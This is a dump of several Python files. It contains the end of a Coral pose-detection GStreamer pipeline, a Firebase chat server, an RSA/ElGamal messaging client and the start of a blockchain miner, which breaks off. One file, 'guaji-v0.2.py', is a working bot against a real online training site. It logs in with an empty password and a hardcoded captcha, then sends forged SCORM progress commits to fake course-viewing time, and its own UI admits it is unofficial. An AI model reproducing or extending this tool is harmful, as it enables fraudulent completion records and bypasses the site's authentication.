y1, x1, y2, x2 = bbox[0], bbox[1], bbox[2], bbox[3]
x, y, w, h = x1, y1, x2 - x1, y2 - y1
# Bounding box.
if good_poses:
if self.bboxes:
svg.write(SVG_BB_RECT.format(x=x, y=y, w=w, h=h))
pose_count += 1
for a, b in EDGES:
if a not in xys or b not in xys:
continue
ax, ay = xys[a]
bx, by = xys[b]
# Skeleton.
if self.skeletons:
svg.write(SVG_KP_LINE.format(x1=ax, y1=ay, x2=bx, y2=by))
svg.write(SVG_TEXT.format(x=0, y='1em', clazz='counter', text=text))
svg.write(SVG_FOOTER)
return svg.getvalue()
# run_inference and aggregate_buffers runs in separate threads
# to allow parallelization between TPU and CPU processing.
def run_inference(self, inf_buf, inf_caps):
start = time.monotonic()
inference_time, data = self.engine.run_inference(inf_buf)
# Underlying output tensor is owned by engine and if we want to
# keep the data around while running another inference we have
# to make our own copy.
self.inf_q.put(data.copy())
if self.save_every_n_frames > 0 and self.frames % self.save_every_n_frames == 0:
meta = GstVideo.buffer_get_video_meta(inf_buf)
result, mapinfo = inf_buf.map(Gst.MapFlags.READ)
image = Image.frombytes('RGB', (meta.width, meta.height), mapinfo.data)
image.save('inf_{:05d}.png'.format(self.frames))
inf_buf.unmap(mapinfo)
elapsed = time.monotonic() - start
self.inf_times.append(elapsed)
# Called on GStreamer streaming thread. Returns
# (svg, out_buf) tuple. Caller guarantees out_buf is freed on
# the gl thread or there's risk of deadlock.
def aggregate_buffers(self, inf_buf, inf_caps, vid_buf, vid_caps, box):
self.frames += 1
start = time.monotonic()
data = self.inf_q.get()
poses, heatmap, bodyparts = self.engine.ParseOutputs(data)
# Clip heatmaps according to aspect ratio difference between camera
# and inference input size
hm_crop_size = self.get_heatmap_texture_size()
hbox_topleft = [
(self.engine.heatmap_size[1]-hm_crop_size[1])//2,
(self.engine.heatmap_size[0]-hm_crop_size[0])//2,
]
heatmap = heatmap[
hbox_topleft[0]:hbox_topleft[0]+hm_crop_size[1],
hbox_topleft[1]:hbox_topleft[1]+hm_crop_size[0]
]
bodyparts = bodyparts[
hbox_topleft[0]:hbox_topleft[0]+hm_crop_size[1],
hbox_topleft[1]:hbox_topleft[1]+hm_crop_size[0]
]
if self.bodyparts:
# Turn bodyparts into different hues, overall heatmap
# acts as opacity mask (alpha channel)
rgba_heatmap = np.dstack([
(np.sum(bodyparts[:,:,RED_BODYPARTS], axis=2)-0.5)*100,
(np.sum(bodyparts[:,:,GREEN_BODYPARTS], axis=2)-0.5)*100,
(np.sum(bodyparts[:,:,BLUE_BODYPARTS], axis=2)-0.5)*100,
heatmap,
])
else:
rgba_heatmap = np.dstack([
np.ones_like(heatmap),
np.zeros_like(heatmap),
np.zeros_like(heatmap),
heatmap])
# Upload heatmap
self.glcontext.thread_add(self.update_heatmap, rgba_heatmap)
# Render new background.
new_bg_buf = self.get_output_buffer(vid_caps)
self.render_to_texture(new_bg_buf, self.render_background, (vid_buf, new_bg_buf))
# Render output image.
if self.anon:
out_buf = self.get_output_buffer(vid_caps, vid_buf.pts)
self.render_to_texture(out_buf, self.render_anon_background, None)
else:
# NXP has an optimization where camera frames in dmabufs are wrapped
# as EGLImages to be used as textures without copies or extra draws.
# This works as source for drawing, but they can't be drawn to. So
# if we get an EGLImage here we need to allocate our own output buffer
# so that we can draw to it. When glvideoflip flips the video this is
# already done there, in which case we can draw straight to vid_buf.
if is_egl_image(vid_buf):
out_buf = self.get_output_buffer(vid_caps, vid_buf.pts)
self.render_to_texture(out_buf, self.render_single_texture, vid_buf)
else:
out_buf = vid_buf
self.render_to_texture(out_buf, self.render_overlays, None)
# Useful for debugging. Simply call this with any GL buffer as the last
# parameter to draw that texture to the first parameter (e.g. out_buf).
# self.render_to_texture(out_buf, self.render_single_texture, self.bg_buf)
now_time = time.monotonic()
self.agg_times.append(now_time - start)
self.frame_times.append(now_time - self.last_frame_time)
self.last_frame_time = now_time
inf_time = 1000 * sum(self.inf_times) / len(self.inf_times)
frame_time = 1000 * sum(self.frame_times) / len(self.frame_times)
with self.trash_lock:
self.trash_buffer(vid_buf)
vid_buf = None
text = 'Inference: {:.2f} ms Total frame time: {:.2f} ms ({:.2f} FPS) Current occupancy: {:d}'.format(
inf_time, frame_time, 1000 / frame_time, len(poses))
if self.print_stats and (self.frames % 100) == 0: print(text)
# Generate SVG overlay.
svg = self.generate_svg(poses, box, text)
return svg, out_buf
def handle_stdin_char(self, char):
if char == TOGGLE_SKELETONS:
self.skeletons = not self.skeletons
elif char == TOGGLE_BBOXES:
self.bboxes = not self.bboxes
elif char == TOGGLE_ANON:
self.anon = not self.anon
elif char == TOGGLE_HEATMAP:
self.hm = not self.hm
elif char == TOGGLE_BODYPARTS:
if not self.hm and self.bodyparts:
self.hm = not self.hm
else:
self.bodyparts = not self.bodyparts
self.hm = self.hm or self.bodyparts
elif char == TOGGLE_RESET:
self.frames = 1
class GstPipeline:
def __init__(self, pipeline, callback):
self.callback = callback
self.pipeline = Gst.parse_launch(pipeline)
self.overlaysink = self.pipeline.get_by_name('overlaysink')
# We're high latency on higher resolutions, don't drop our late frames.
# TODO: Maybe make this dynamic?
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
inference = self.pipeline.get_by_name('inf')
inference.callback = callback.run_inference
aggregator = self.pipeline.get_by_name('agg')
aggregator.buffers_aggregated_callback = self.on_buffers_aggregated
aggregator.trash_lock = self.callback.trash_lock
aggregator.trash_buffer_callback = self.callback.trash_buffer
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
self.box = None
self.setup_window()
def run(self):
# Set to READY and wait, get OpenGL context.
self.pipeline.set_state(Gst.State.READY)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
assert self.overlaysink.glcontext
self.overlaysink.glcontext.thread_add(self.callback.init_gl)
if sys.stdin.isatty():
fd = sys.stdin.fileno()
old_mode = termios.tcgetattr(fd)
new_mode = termios.tcgetattr(fd)
new_mode[3] = new_mode[3] & ~(termios.ICANON | termios.ECHO)
termios.tcsetattr(fd, termios.TCSANOW, new_mode)
GLib.io_add_watch(sys.stdin, GLib.IO_IN, self.on_stdin)
try:
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
Gtk.main()
except:
pass
finally:
if sys.stdin.isatty():
termios.tcsetattr(fd, termios.TCSAFLUSH, old_mode)
# Clean up.
self.pipeline.set_state(Gst.State.READY)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
self.callback.empty_trash()
self.callback.running = False
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
# Try to seek back to the beginning. If pipeline
# isn't seekable we shouldn't get here in the first
# place so if seek fails just quit.
if not self.pipeline.seek_simple(Gst.Format.TIME,
Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,
0):
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_buffers_aggregated(self, inf_buf, inf_caps, vid_buf, vid_caps):
svg, out_buf = self.callback.aggregate_buffers(inf_buf, inf_caps,
vid_buf, vid_caps, self.get_box())
if svg:
self.overlaysink.set_property('svg', svg)
return out_buf
# Returns a cached representation of the inference scaling box.
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
assert glbox
glbox = glbox.get_by_name('filter')
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
return self.box
# stdin is ready for reading
def on_stdin(self, file, cond):
char = file.read(1)
if len(char) == 1:
self.callback.handle_stdin_char(char)
return True
return False
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
gi.require_version('GstVideo', '1.0')
from gi.repository import GstGL, GstVideo
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window()
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
class Aggregator(GstBase.Aggregator):
SINK_CAPS = 'video/x-raw(memory:GLMemory),format=RGBA,width=[1,{max_int}],height=[1,{max_int}],texture-target=2D'
SINK_CAPS += '; video/x-raw,format=RGB,width=[1,{max_int}],height=[1,{max_int}]'
SINK_CAPS = Gst.Caps.from_string(SINK_CAPS.format(max_int=GLib.MAXINT))
SRC_CAPS = 'video/x-raw(memory:GLMemory),format=RGBA,width=[1,{max_int}],height=[1,{max_int}],texture-target=2D'
SRC_CAPS = Gst.Caps.from_string(SRC_CAPS.format(max_int=GLib.MAXINT))
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (
Gst.PadTemplate.new_with_gtype("sink_%u",
Gst.PadDirection.SINK,
Gst.PadPresence.REQUEST,
SINK_CAPS,
GstBase.AggregatorPad.__gtype__),
Gst.PadTemplate.new_with_gtype("src",
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
SRC_CAPS,
GstBase.AggregatorPad.__gtype__))
# TODO: report actual latency
def __init__(self):
self.vid_pad = None
self.inf_pad = None
self.vid_caps = None
self.inf_caps = None
self.buffers_aggregated_callback = None
self.trash_buffer_callback = None
# TODO: gracefully handle errors.
def ensure_pads_found(self):
if self.vid_pad and self.inf_pad:
return
for pad in self.sinkpads:
caps = pad.get_current_caps()
feature = caps.get_features(0).get_nth(0)
struct = caps.get_structure(0)
if feature == Gst.CAPS_FEATURE_MEMORY_SYSTEM_MEMORY:
self.inf_pad = pad
self.inf_caps = caps
elif feature == GstGL.CAPS_FEATURE_MEMORY_GL_MEMORY:
self.vid_pad = pad
self.vid_caps = caps
assert self.vid_pad and self.inf_pad
def do_aggregate(self, timeout):
self.ensure_pads_found()
assert self.buffers_aggregated_callback
assert self.trash_lock
assert self.trash_buffer_callback
vid_buf = self.vid_pad.pop_buffer()
inf_buf = self.inf_pad.pop_buffer()
# If either input is empty we're EOS (end of stream).
if not vid_buf or not inf_buf:
with self.trash_lock:
self.trash_buffer_callback(vid_buf)
vid_buf = None
return Gst.FlowReturn.EOS
# Get the output buffer to push downstream.
out_buf = self.buffers_aggregated_callback(inf_buf, self.inf_caps, vid_buf, self.vid_caps)
# Unref the inputs ASAP. Drop the final video ref in the GL thread
# or there's deadlock between the GL lock and the Python GIL.
with self.trash_lock:
self.trash_buffer_callback(vid_buf)
vid_buf = None
inf_buf = None
# Push buffer downstream.
ret = self.finish_buffer(out_buf)
# Finally drop the ref to the output buffer, again in the GL thread.
with self.trash_lock:
self.trash_buffer_callback(out_buf)
out_buf = None
return ret
def do_fixate_src_caps (self, caps):
self.ensure_pads_found()
return self.vid_caps
class Inference(GstBase.BaseTransform):
CAPS = 'video/x-raw,format=RGB,width=[1,{max_int}],height=[1,{max_int}]'
CAPS = Gst.Caps.from_string(CAPS.format(max_int=GLib.MAXINT))
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
CAPS),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
CAPS)
)
# TODO: report actual latency
def __init__(self):
self.caps = None
self.set_passthrough(False)
self.callback = None
def do_set_caps(self, in_caps, out_caps):
assert in_caps.is_equal(out_caps)
self.caps = in_caps
return True
def do_transform_ip(self, buf):
assert self.callback
self.callback(buf, self.caps)
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Aggregator)
Gst.Element.register(plugin, 'aggregator', 0, gtype)
gtype = GObject.type_register(Inference)
Gst.Element.register(plugin, 'inference', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(cb, src_size, inference_size, video_src,
h264=False, jpeg=False, mirror=False):
SRC_CAPS = '{format},width={width},height={height},framerate=30/1'
INF_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
direction = 'horiz' if mirror else 'identity'
PIPELINE = 'aggregator name=agg ! glsvgoverlaysink name=overlaysink \n'
if video_src.startswith('/dev/video'):
PIPELINE += 'v4l2src device={video_src} ! {src_caps}\n ! {lq} ! {decoder}'
if jpeg:
src_format = 'image/jpeg'
decoder = 'decodebin'
elif h264:
src_format = 'video/x-h264'
decoder = 'decodebin'
else:
src_format = 'video/x-raw'
decoder = 'identity'
else:
PIPELINE += 'filesrc location={video_src} ! {decoder}'
src_format = ''
decoder = 'decodebin'
PIPELINE += """ ! glupload ! glvideoflip video-direction={direction} ! tee name=t
t. ! {q} ! glfilterbin filter=glbox name=glbox ! {inf_caps} !
{q} ! inference name=inf ! agg.
t. ! {q} ! agg.
"""
src_caps = SRC_CAPS.format(format=src_format, width=src_size[0], height=src_size[1])
inf_caps = INF_CAPS.format(width=inference_size[0], height=inference_size[1])
q = 'queue max-size-buffers=1'
lq = 'queue max-size-buffers=1 leaky=downstream'
pipeline = PIPELINE.format(src_caps=src_caps, inf_caps=inf_caps, direction=direction,
lq=lq, q=q, video_src=video_src, decoder=decoder)
print('\nGstreamer pipeline:\n')
print(pipeline)
pipeline = GstPipeline(pipeline, cb)
pipeline.run()
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--mirror', help='flip video horizontally', action='store_true')
parser.add_argument('--model', help='.tflite model path.', required=False)
parser.add_argument('--width', help='Source width', default='1920')
parser.add_argument('--height', help='Source height', default='1080')
parser.add_argument('--videosrc', help='Which video source to use', default='/dev/video0')
parser.add_argument('--h264', help='Use video/x-h264 input', action='store_true')
parser.add_argument('--jpeg', help='Use video/jpeg input', action='store_true')
args = parser.parse_args()
if args.h264 and args.jpeg:
print('Error: both mutually exclusive options h264 and jpeg set')
sys.exit(1)
default_model = 'models/bodypix_mobilenet_v1_075_1024_768_16_quant_edgetpu_decoder.tflite'
model = args.model if args.model else default_model
print('Model: {}'.format(model))
engine = PoseEngine(model)
inference_size = (engine.image_width, engine.image_height)
print('Inference size: {}'.format(inference_size))
src_size = (int(args.width), int(args.height))
if args.videosrc.startswith('/dev/video'):
print('Source size: {}'.format(src_size))
print('Toggle mode keys:')
print(' Toggle skeletons: ', TOGGLE_SKELETONS)
print(' Toggle bounding boxes: ', TOGGLE_BBOXES)
print(' Toggle anonymizer mode: ', TOGGLE_ANON)
print(' Toggle heatmaps: ', TOGGLE_HEATMAP)
print(' Toggle bodyparts: ', TOGGLE_BODYPARTS)
run_pipeline(Callback(engine, src_size, save_every_n_frames=-1, print_stats=True),
src_size, inference_size, video_src=args.videosrc, h264=args.h264, jpeg=args.jpeg,
mirror=args.mirror)
if __name__== "__main__":
main()
|
guaji-v0.2.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:dawson
from Tkinter import *
from tkMessageBox import *
import requests
import threading
import time
import json
import random
import base64
import os
from icon import img
reload(sys)
sys.setdefaultencoding( "utf-8" )
wxkc=[]
userlist=[]
def btn_submit():
#获取信息
yhm=entry_id.get()
headers = {'content-type': 'text/json','User-Agent':'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'}
cookies={'ASP.NET_SessionId':'ji4zk1yzsv1jwvhubwrewect'}
url='http://yqgbpx.cn/yonghu.svc/Login'
data={"yhm":yhm,"mima":"","yanzhengma":"0683","yanzhengmamd5":"8756026CFC20EA25CB630F95D80C48D9"}
r = requests.post(url,headers=headers,data=json.dumps(data),cookies=cookies)
userinfo=json.loads(r.text)['d']
url1='http://yqgbpx.cn/xuexiindex.svc/SelectYonghuxuexiqingkuang_simple'
name=userinfo['Xingming']
dwid=userinfo['DanweiId']
if dwid!=820:
showerror("提示:", "对不起,非指定单位用户!!")
app.destroy()
data={"yhid":userinfo['Yhid']}
userlist.append(userinfo['Yhid'])
userlist.append(userinfo['Yhid'])
r = requests.post(url1,headers=headers,data=json.dumps(data),cookies=cookies)
infolist=json.loads(r.text)['d'][0]
lbl_kcjd = Label(app, text='姓名: '+name+' 已学习课程数:'+str(infolist["m_Item2"])+' 已学习分钟数:'+str(infolist["m_Item3"])+' 已获得学分数:'+str(infolist["m_Item4"]))
lbl_kcjd.grid(row=1, column=1)
url2='http://yqgbpx.cn/xuexiindex.svc/Selectyonghuxuexikecheng'
data={"yhid":userinfo['Yhid'],"changshangId":-1,"kechengmc":"","zhujiangren":"","zhuantiId":-1,"pageIndex":1,"pageSize":10}
r = requests.post(url2,headers=headers,data=json.dumps(data),cookies=cookies)
s=r.text
count=0
for i in json.loads(s)['d']:
wxkc.append([i["ChangshangkechengId"],i["Shichang"]])
btn_method = Checkbutton(fm1, variable = v,onvalue=count, text='课程名称: '+str(i["KechengMc"])+' 课程时长: '+str(i["Shichang"])+' 课程ID: '+str(i["ChangshangkechengId"]), command = callCheckbutton)
btn_method.grid(row=count, column=0, sticky=W, padx=1)
count+=1
def listen(yhid,kcid,mytime):
session_time="00:00:"+str(mytime)
if mytime==60:
session_time="00:01:00"
lsurl='http://www.yqgbpx.cn:81/Scorm12.svc/LMSCommit'
headers = {'content-type': 'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'}
lscookies={"ASP.NET_SessionId":"uyomaapuhy2wdqwe2zgx30zz","InitilizeParam":"kehuId=200&yhId=1018187&kechengId=100021&op=10&shichang=125&xuexizhuangtai=0&lesson_location=&url=index.htm&host=www.yqgbpx.cn&ziyuanleixingid=10","currentState":"lastErrorCode=0&bInitilized=1&bCommitted=0","currentdata":"kehuid=200&student_id=1018187&student_name=&kechengid=100021&scoid=&session_time=00:00:01&lesson_location=704&lesson_status=incomplete&entry=ab-initio&scoreraw=&exit=&credit=no-credit&total_time=0:0:0&lesson_mode=normal&xuexizhuangtai=0&Totaltime=0","currentdata1":""}
lgdata={"obj":{"KehuId":"200","Yhid":yhid,"KechengId":kcid,"Scoid":"","session_time":session_time,"Lesson_location":"704","Lesson_status":"incomplete","Entry":"ab-initio","Scoreraw":"","Lesson_mode":"normal","Exit":"","Suspend_data":"","Totaltime":"0"}}
r = requests.post(lsurl,cookies=lscookies,headers=headers,data=json.dumps(lgdata))
def gjcore():
yhid=userlist[0]
kcid=str(wxkc[v.get()][0])
count=0
var.set('正在挂机: ')
while True:
mytime=random.randint(20, 60)
listen(yhid,kcid,mytime)
time.sleep(mytime)
count+=mytime
var.set('已挂机: '+str(count)+' 秒--共计:'+str(count/60)+' 分钟')
if count>=int(wxkc[v.get()][1])*60:
break
var.set('所选课程已全部听完')
def guaji():
th=threading.Thread(target=gjcore)
th.setDaemon(True)
th.start()
#####创建窗口#####
app = Tk()
app.title("挂机软件v0.2 指定单位免费版 作者 --Dawson")
tmp = open("tmp.ico","wb+")
tmp.write(base64.b64decode(img))
tmp.close()
app.iconbitmap("tmp.ico")
os.remove("tmp.ico")
#####创建控件#####
#第一行 地址
lbl_id = Label(app, text="请输入用户名:")
lbl_id.grid(row=0,sticky=E)
yhid=StringVar()
entry_id = Entry(app,textvariable=yhid)
entry_id.grid(row=0, column=2)
lbl_id = Label(app, text="请输入密码:")
lbl_id.grid(row=0,column=3,sticky=E)
entry_mm = Entry(app,show = '*')
entry_mm.grid(row=0, column=4)
btn_submit = Button(app, text="获取用户及课程信息",command=btn_submit)
btn_submit.grid(row=0, column=5)
#展示课程信息
lbl_kcxx = Label(app, text="个人信息:")
lbl_kcxx.grid(row=1, column=0,sticky=W)
#选择课程
lbl_xzkc = Label(app, text="未学习课程:")
lbl_xzkc.grid(row=2, column=0, sticky=W)
fm1 = Frame()
fm1.grid(row=2, column=1, sticky=W)
v = IntVar()
def callCheckbutton():
lbl_kclb = Label(app, text='所选课程id为')
lbl_kclb.grid(row=4, column=0, sticky=W, pady=1, padx=1)
lbl_kclb = Label(app, text=str(wxkc[v.get()][0]))
lbl_kclb.grid(row=4, column=1, sticky=W, pady=1, padx=1)
return v.get()
#挂机按钮
btn_guaji = Button(app, text="开始挂机",command=guaji)
btn_guaji.grid(row=5, column=1, sticky=W, padx=5,pady=10)
lbl_gj = Label(app, text='挂机进度: ')
lbl_gj.grid(row=6, column=0, sticky=W, pady=1, padx=1)
var=StringVar()
var.set(' ')
lbl_gjsj = Label(app,textvariable=var)
lbl_gjsj.grid(row=7, column=0, sticky=W, pady=1, padx=1)
lbl_id = Label(app, text="Tip:①请联网使用!一次只展示10条未听课程 ")
lbl_id.grid(row=8 )
lbl_id = Label(app, text="②默认勾选不生效,须选择一个课程 ")
lbl_id.grid(row=9 )
lbl_id = Label(app, text="③界面出现所选课程id后即可挂机 ")
lbl_id.grid(row=10)
lbl_id = Label(app, text="④听完可登陆浏览器确定进度并答题 ")
lbl_id.grid(row=11)
lbl_id = Label(app, text="⑤界面画风请忽略,保证无毒无害,放心使用 ")
lbl_id.grid(row=12)
lbl_id = Label(app, text="⑥低调使用,毕竟非正规,且挂且珍惜 ")
lbl_id.grid(row=13)
lbl_id = Label(app, text="⑦免费版本不开启如自动听课等变态功能 ")
lbl_id.grid(row=14)
app.mainloop()
|
server.py
|
import socket, threading
import firebase_admin
from firebase_admin import credentials, auth, db
cred = credentials.Certificate("firebase/opensw-team1-firebase-adminsdk-ln99u-734bf11a84.json")
default_app = firebase_admin.initialize_app(cred, {
'databaseURL' : 'https://opensw-team1-default-rtdb.asia-southeast1.firebasedatabase.app/'
})
class Room:
def __init__(self):
self.gamers = []
self.allChat=None
def addClient(self, c):
self.gamers.append(c)
def delClient(self, c):
self.gamers.remove(c)
def sendMsgAll(self, msg):
for i in self.gamers:
print(i)
i.sendMsg(msg)
#접속자에게 보여지는 화면
class ChatClient:
def __init__(self, r, soc):
self.room = r
self.id = None
self.soc = soc
def readMsg(self):
self.id = self.soc.recv(1024).decode()
msg = self.id + '님이 입장하셨습니다'
self.room.sendMsgAll(msg)
while True:
msg = self.soc.recv(1024).decode()
if msg == '/stop':
self.soc.sendall(msg)
self.room.delClient(self)
break
msg = self.id+': '+ msg
self.room.sendMsgAll(msg)
self.room.sendMsgAll(self.id + '님이 퇴장하셨습니다.')
def sendMsg(self, msg):
print(type(msg))
self.soc.sendall(msg.encode(encoding='utf-8'))
#서버에게 보여지는 화면
class ChatServer:
HOST = socket.gethostbyname(socket.gethostname())
PORT = 9999
is_another_server_online = False
def __init__(self):
if(db.reference('server_info').child('is_server_open').get() == 'True') :
print('서버가 이미 열려있습니다.')
self.is_another_server_online = True
return
db.reference('server_info').child('current_server_ip').set(self.HOST)
db.reference('server_info').child('is_server_open').set('True')
self.server_soc = None
self.room = Room()
self.run()
def __del__(self):
#다른 호스트가 서버를 열었다면, 서버 상태를 offline으로 바꾸지 않고 종료합니다.
if(self.is_another_server_online != True) :
db.reference('server_info').child('is_server_open').set('False')
def open(self):
self.server_soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_soc.bind((ChatServer.HOST, ChatServer.PORT))
self.server_soc.listen()
def run(self):
self.open()
print('서버 시작')
while True:
client_soc, addr = self.server_soc.accept()
print(addr, '접속')
c = ChatClient(self.room, client_soc)
self.room.addClient(c)
print('접속자:',self.room.gamers)
th = threading.Thread(target=c.readMsg)
th.start()
#self.server_soc.close()
def main():
ChatServer()
main()
|
client.py
|
from Gamal import *
from cert_utils import *
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import serialization
from flask import Flask, redirect, url_for, request
import threading
import os
import base64
app = Flask(__name__)
import requests
import argparse
from base64 import b64encode, b64decode
@app.route('/msg', methods=['POST'])
def receive_message():
input_json = request.get_json(force=True)
encrypted_message = input_json["msg"]
sig_r = input_json["sig_r"]
sig_s = input_json["sig_s"]
sender_id = input_json["id"]
message = private_key_decrypt(encrypted_message, client_private_key) # Decrypt the message.
print(" Requesting certificates for user: ", sender_id)
client_data = {'id': client_id,
'receiver': sender_id}
res = requests.post(ca_url + "/get_client_key_cert", json=client_data)
receiver_cert = cert_from_bytes(str.encode(res.text))
valid_cert = cert_validate_signature(receiver_cert, ca_public_key) # Validate cert.
if valid_cert:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is valid")
else:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is invalid")
return
res = requests.post(ca_url + "/get_client_gammal_cert", json=client_data)
receiver_cert = cert_from_bytes(str.encode(res.text))
valid_cert = cert_validate_signature(receiver_cert, ca_public_key) # Validate cert.
if valid_cert:
print("Gammal public key cert received from CA for receiver: ", client_data["receiver"],
" is valid")
else:
print("Gammal public key cert received from CA for receiver: ", client_data["receiver"],
" is invalid")
return
gammal_fake_pub_key = cert_get_pub_key(receiver_cert)
gammal_pub_key = get_fake_key_val(gammal_fake_pub_key)
valid_signature = verifyElGamalSignature(gammal_pub_key, sig_r, sig_s, message)
print("Message received from: ", sender_id)
if valid_signature:
print("Valid signature of: ", sender_id)
else:
print("Invalid signature")
return "no"
if valid_signature:
print("Message:", message)
return "ok"
def send_message(message, url):
"""
Get receiver certificate, validate it, encrypts the message with it and then send it.
"""
client_data = {'id': client_id,
'receiver': other_client_id}
res = requests.post(ca_url + "/get_client_key_cert", json=client_data)
receiver_cert = cert_from_bytes(str.encode(res.text))
valid_cert = cert_validate_signature(receiver_cert, ca_public_key) # Validate cert.
if valid_cert:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is valid")
else:
print("RSA public key cert received from CA for receiver: ", client_data["receiver"],
" is invalid")
return
receiver_public_key = cert_get_pub_key(receiver_cert)
encrypted_message = public_key_encrypt(message, receiver_public_key)
rr, ss = generateElGamalSignature(sig_priv, message) # signature.
client_data = {'id': client_id,
'msg': encrypted_message,
"sig_r": rr,
"sig_s": ss
}
requests.post(url + "/msg", json=client_data)
def publish_client_data_to_ca(ca_url):
# Generating certificate for rsa public key.
client_data = {'id': client_id,
'public_key': client_public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo,
)}
requests.post(ca_url + "/generate_key_cert", json=client_data)
# Generating certificate for el gammal public key.
client_data = {'id': client_id,
'public_key': sig_pub_key}
requests.post(ca_url + "/generate_gammal_cert", json=client_data)
def send_loop():
while True:
message = input(" write message to send to client: " + other_client_url +
" | write exit to exit\n") # Message to send.
if message == "exit":
return
send_message(message, other_client_url)
print(" Message sent")
if __name__ == "__main__":
sig_priv, sig_pub_key = generateElGamalKey()
curr_dir_path = os.path.dirname(os.path.realpath(__file__)) # Get current directory
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--port", help="your port")
parser.add_argument("-op", "--otherport", help="receiver port")
args = parser.parse_args()
ca_public_key = public_key_load(curr_dir_path + "/ca/ca_public_key.pem")
other_client_id = args.otherport
other_client_url = 'http://127.0.0.1:' + args.otherport
client_id = args.port
client_private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()) # Generate private key for client.
client_public_key = client_private_key.public_key() # Generate public key for client.
ca_url = 'http://127.0.0.1:5000'
print(" Sending ", client_id, " data to CA")
publish_client_data_to_ca(ca_url)
sending_thread = threading.Thread(target=send_loop)
sending_thread.start()
app.run(port=args.port)
|
miner.py
|
import time
import hashlib
import json
import requests
import base64
from flask import Flask, request
from multiprocessing import Process, Pipe
import ecdsa
from miner_config import MINER_ADDRESS, MINER_NODE_URL, PEER_NODES
node = Flask(__name__)
class Block:
def __init__(self, index, timestamp, data, previous_hash):
"""Returns a new Block object. Each block is "chained" to its previous
by calling its unique hash.
Args:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
Attrib:
index (int): Block number.
timestamp (int): Block creation timestamp.
data (str): Data to be sent.
previous_hash(str): String representing previous block unique hash.
hash(str): Current block unique hash.
"""
self.index = index
self.timestamp = timestamp
self.data = data
